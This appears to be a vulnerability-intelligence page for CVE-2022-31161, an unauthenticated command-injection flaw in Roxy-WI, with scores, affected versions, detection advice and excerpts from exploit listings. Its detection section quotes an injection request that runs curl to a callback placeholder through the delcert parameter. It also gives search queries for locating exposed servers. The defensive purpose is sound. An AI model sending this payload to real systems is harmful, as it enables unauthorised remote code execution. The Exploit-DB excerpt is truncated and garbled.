CVE-2022-31161
Published 2022-07-15
Priority: P1 · 84 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
In the wild (ITW) · Exploit available · VulnCheck KEV
Exploited in the wild
EPSS: 20.45% (97.2th percentile)
Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hap-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
| roxy-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
Detection & IOCs (extracted from sources)
Observed request body (other): show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20{{interactsh-url}};
- Monitor for POST requests to /app/options.py containing the 'delcert' parameter with shell metacharacters (e.g., %20&%20, semicolons) indicating OS command injection attempts.
- Detect unauthenticated POST requests to /app/options.py — the exploit requires no authentication (token= is empty), making unauthenticated access to this endpoint a strong signal.
- Use Shodan/FOFA queries to identify exposed Roxy-WI instances: Shodan query 'html:"Roxy-WI"' and FOFA query 'body="roxy-wi"'.
- Look for outbound curl requests originating from the web server process shortly after a POST to /app/options.py, as the payload injects a curl command via the delcert parameter.
- The vulnerability exists in Roxy-WI versions prior to 6.1.1.0 only; version 6.1.1.0 contains the patch. Ensure version checks are part of triage.
- The exploit is unauthenticated (empty token field), meaning no credentials are required to trigger RCE — detection rules should not filter on authentication state.
CVSS provenance
- NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 10.0 CRITICAL
No detection rules found.
Exploit-DB
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
exploitdb · 2023-04-03 · CVSS 10.0
---
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI .oastify.com;
Nuclei
Roxy-WI - Remote Code Execution
nuclei · CVSS 9.8
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.
Template:
id: CVE-2022-31161
info:
  name: Roxy-WI - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the delcert parameter without proper input validation in the /app/options.py file, allowing attackers to inject arbitrary OS commands.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Users are adv
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/171652/Roxy-WI-6.1.1.0-Remote-Code-Execution.html
- https://github.com/hap-wi/roxy-wi/releases/tag/v6.1.1.0
- https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-pg3w-8p63-x483